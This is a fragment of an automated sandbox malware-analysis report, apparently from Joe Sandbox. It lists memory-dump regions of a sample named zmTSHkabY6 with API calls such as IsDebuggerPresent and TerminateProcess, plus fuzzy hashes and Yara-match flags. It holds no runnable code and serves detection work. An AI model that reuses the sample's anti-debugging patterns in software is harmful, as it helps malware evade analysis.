                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >ko$M6ww${t[M$nm
                                                                    • API String ID: 0-1959658425
                                                                    • Opcode ID: 352aaf970f62875ce6b05b7af28a4fb5a1ff194df2adfc41ddc90c96a3beedf8
                                                                    • Instruction ID: 4727e1cc3eb95199143eac9106fd68dfdb5e4f54e99ce24771b7044e2b705f43
                                                                    • Opcode Fuzzy Hash: 352aaf970f62875ce6b05b7af28a4fb5a1ff194df2adfc41ddc90c96a3beedf8
                                                                    • Instruction Fuzzy Hash: 84B23AF3A0C2049FE704AE2DEC8567ABBE5EF94720F1A853DEAC5C3744E93558048697
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E89A25
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E89AF1
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E89B11
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E89B1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction ID: c1bad1790536194aad1d09653a438acc9950d57113c271502017d6692a13d3b3
                                                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction Fuzzy Hash: 6031FAB5D0521C9BDB10EF64D9897DCBBF8BF08304F1041AAE40DA7250EB715A85DF45
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                                    • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00E8C412
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E8C41C
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00E8C429
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                                    • Instruction ID: 6590a0ea08f444ec7cee3895b0e59b44adeeb05c8c8a8e2fec3e2b8583bef43b
                                                                    • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                                    • Instruction Fuzzy Hash: 7631C674D012289BCB21EF68D9897DCBBF4BF08310F6051EAE41CA7251E7709B858F59
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                                    • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                                    • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                                    • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,00E8F173,00000000,0041D0A0,?,00000000,?,00E91714), ref: 00E8F196
                                                                    • TerminateProcess.KERNEL32(00000000,?,00E8F173,00000000,0041D0A0,?,00000000,?,00E91714), ref: 00E8F19D
                                                                    • ExitProcess.KERNEL32 ref: 00E8F1AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction ID: 11deb8364f2d01a1b7da0a3c46e904638d9faf481a366fbb792d7b9a3c5d08fa
                                                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction Fuzzy Hash: 1FE0B671445218EFCF217B64DD4DA893B69FF50345F005424F80996232DB76DD81CB84
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                                    • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                                    • ExitProcess.KERNEL32 ref: 10005F60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                                    • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                                    • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                                    • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$GetProcAddress.$l
                                                                    • API String ID: 0-2784972518
                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                    • Instruction ID: 348bd8866032c2c62abf97c794ad83b84050c898a572c7c4b386c273a0876e7d
                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                    • Instruction Fuzzy Hash: F3316BB6900609CFDB11DF99C880AADBBF5FF88328F15504AD849B7211D771EA49CBA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction ID: f2b45021e5a58549abe38d60bc0cfaf4ec41aa78e5dd6cd8d3efaf59b4593705
                                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction Fuzzy Hash: 5EF11C71E002199FDF18DFA9D9806ADB7B1EF88314F25826AD81DBB344D731AD41CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                                    • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Q& X$Ry^
                                                                    • API String ID: 0-3192898545
                                                                    • Opcode ID: d60e6e8c2915f504e73f28996a7e616eb430416e50c6f6577f26ce33b6432354
                                                                    • Instruction ID: cdf4601282bf851979ad826bc450c0bf44c699eb3e0cd220346c26ac402f65e4
                                                                    • Opcode Fuzzy Hash: d60e6e8c2915f504e73f28996a7e616eb430416e50c6f6577f26ce33b6432354
                                                                    • Instruction Fuzzy Hash: 8561D6F2D086009FE710AE28DD4577ABBE2EF94720F16893DDAC497384E6399815C787
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Ow3
                                                                    • API String ID: 0-2993812668
                                                                    • Opcode ID: 63ab130ae1c8825cfa0e4fb6be36930ffaf95d4b6111a5f9d808f4a6478475b4
                                                                    • Instruction ID: db1ef00bc98f815cf21e513519e0448ba0acc04cc79ecd130ddd76afb8ad0230
                                                                    • Opcode Fuzzy Hash: 63ab130ae1c8825cfa0e4fb6be36930ffaf95d4b6111a5f9d808f4a6478475b4
                                                                    • Instruction Fuzzy Hash: 7D924BF360C2049FE304AE2DEC8567ABBE5EF94320F168A3DE6C5C7744EA3558058697
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >Tw
                                                                    • API String ID: 0-2637525596
                                                                    • Opcode ID: 50855c562abdbd0173daffdfc0844eeeddcd9536a1a143251d6fc317ff8bacdf
                                                                    • Instruction ID: 5e7038d2b06e48d0d215fbd3d2127dd14376a71ccb43adc45d671d4b61156ddf
                                                                    • Opcode Fuzzy Hash: 50855c562abdbd0173daffdfc0844eeeddcd9536a1a143251d6fc317ff8bacdf
                                                                    • Instruction Fuzzy Hash: 8F82D6F36082009FE304AE2DEC8567ABBE5EFD4720F16893DEAC4C7744E63598458697
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E93F48,?,?,00000008,?,?,00E9AB25,00000000), ref: 00E9417A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction ID: 16bc91e0d0daa9fcdb3d3f37c2b55a1ffb3989f0e451063d1939abf072b3d989
                                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction Fuzzy Hash: C3B15C71610604DFDB18CF28C486EA57BE0FF44368F259658E99ADF2E1C335E992CB40
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                                    • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                     • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                     • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                                    • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                                    • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                                    • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004099C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                                    • Instruction ID: fa6e1b123792800c16e511e7ad2770c43bb66d79c6f5260c400c77222bdc654c
                                                                    • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                                    • Instruction Fuzzy Hash: 86517AB1A103158BDB24CF54D981BAABBF0FB88314F24853AC802EB395D378AD51CF59
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00409955,00E897B6), ref: 00E89BB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                                    • Instruction Fuzzy Hash:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction ID: bf86f0fc14ba33702e0ad8c492274cfc63034f4262aa4a3967971b12236ab583
                                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction Fuzzy Hash: 72517B3060CB489ADB3CBA6C8C957FE67DA9B8230CF243519D48EF72C1D6919D49D352
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction ID: 415f6ad4851fe9f8750e37a8715b6f5a238b036775a3a8bf8c4db743c11d2111
                                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction Fuzzy Hash: 20517C7020C64C66DB38BA688C95BFE67D99B02308F14341FD48EFB2C1E616DD44A356
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                                    • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                                    • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                    • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                                    • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 785aa5f7bd89d43373c67abcccc6bd0ca1e67064ef5bd75b52faf7b9ae67f377
                                                                    • Instruction ID: 79b93ca4e33cf261de9842ec79ee2ce3fedbdd663315f56b076c97fc97338fd7
                                                                    • Opcode Fuzzy Hash: 785aa5f7bd89d43373c67abcccc6bd0ca1e67064ef5bd75b52faf7b9ae67f377
                                                                    • Instruction Fuzzy Hash: 8D516AF3E042244BE704693CDD5877AB695DB58310F1B463CDE89E7B84E87B9D0586C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 803aec6336ecb1bee3b849faf1981459924ad18891fd1c3a93bf1b3b4b5156d0
                                                                    • Instruction ID: e0406e90464e6ee175ecb3cba821fa3f6ab9529fd2cea4b357fdb86e798a3973
                                                                    • Opcode Fuzzy Hash: 803aec6336ecb1bee3b849faf1981459924ad18891fd1c3a93bf1b3b4b5156d0
                                                                    • Instruction Fuzzy Hash: 4E31C0B288831E8FDB55CF64C2411EE77A4FF8A334F244029D846DBA02D2726C66DF49
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction ID: ff89ea477c949eea0660dce8356e6b33811a7b0bf9dbf31960d836e20e548d33
                                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction Fuzzy Hash: 9521B373F205394B7B0CC57E8C562BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                                                    • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                                                    Memory Dump Source
